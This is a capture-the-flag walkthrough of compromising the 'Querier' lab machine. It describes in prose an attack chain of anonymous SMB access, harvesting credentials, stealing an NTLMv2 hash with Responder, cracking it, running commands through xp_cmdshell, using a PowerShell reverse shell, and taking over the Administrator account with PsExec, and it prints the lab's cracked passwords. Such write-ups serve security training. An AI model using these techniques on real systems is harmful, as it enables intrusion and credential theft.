Querier is a medium-rated Windows machine which had an open Samba share available through anonymous authentication, containing a single file that was giving me enough information to authenticate to MSSQL as a low privileged sql user. From there, I stole an NTLMv2 hash of another MSSQL user with ‘Responder’ and cracked it to gain a high privileged MSSQL authentication, enabling xp_cmdshell to execute system commands, gaining an initial foothold as a low privileged user, discovering the admin’s plaintext password and PsExec’ing to the machine with the Administrator’s creds to completely compromise the machine. Let’s get right to it.
First and foremost we start with the nmap scan
We can see SMB ports are open(139,445) and another interesting port is 1433 (MSSQL).
I list the SMB shares with ‘smbclient’ as an anonymous user (not providing a password, just pressing Enter)
I see an interesting share named ‘Reports’, which I will try to access through anonymous authentication as well.
I list the contents of the share to discover a .xlsm file, downloading it to my machine with the ‘get’ command in smbclient
After opening the document with libreoffice seeing an absolutely empty document, I decide to run a ‘strings’ command on the file.
Hmm, it seems like it has some kind of a folder-file hierarchy, I then decide to ‘binwalk’ the file to maybe extract the files within it.
It indeed extracted some folders and files inside of them. I explored the contents of the extracted data to catch something that looks like credentials.
I then decide to try to use these credentials on the MSSQL port, using impacket’s mssqlclient.
Great! I authenticated to the MSSQL server finding out I do not have the permissions to enable xp_cmdshell, I then decide to fire up Responder to steal an NTLMv2 hash.
Now I’ll direct the MSSQL user to a most-likely non-existent network folder, and catch an NTLMv2 hash.
Sweet, I captured an NTLMv2 hash of the “MSSQL-SVC” user, I now try to crack this hash using ‘hashcat’.
I successfully cracked the hash! Now we have more credentials = MSSQL-SVC : corporate568
I now try to authenticate as this user to MSSQL.
Awesome! I authenticated as MSSQL-SVC and he has enough permissions to enable xp_cmdshell to execute system commands!
Awesome! I now have remote command execution! I search if powershell exists on the machine, figuring out it is, and generating a powershell reverse shell from ‘itm4n’ https://itm4n.github.io/tools/
Running the generated base64 encoded reverse shell to gain an initial foothold as “mssql-svc”.
We’re in the system! Grabbing user.txt :
Checking the user’s privileges using the “whoami /priv” command, seeing an interesting privilege SeImpersonatePrivilege which instantly triggers me to use JuicyPotato against the machine. Although JuicyPotato wasn’t working as I couldn’t find any valid CLSIDs, I decided to transfer winPEAS to the target machine to see if there’s anything special/out of place.
Setting up a python HTTP server on port 80 using the command “python3 -m http.server 80”
Using Invoke-WebRequest on the target machine to download the file
Now I launched .\wp.exe and saw a plaintext administrator password
This looks like credentials! I now use PsExec and authenticate with the credentials “Administrator : MyUnclesAreMarioAndLuigi!!1!” and successfully gain full control over the target system. Grabbing root.txt and running the command “ipconfig” as an additional proof.
I fully compromised the target system! Great box, very fun and educating.
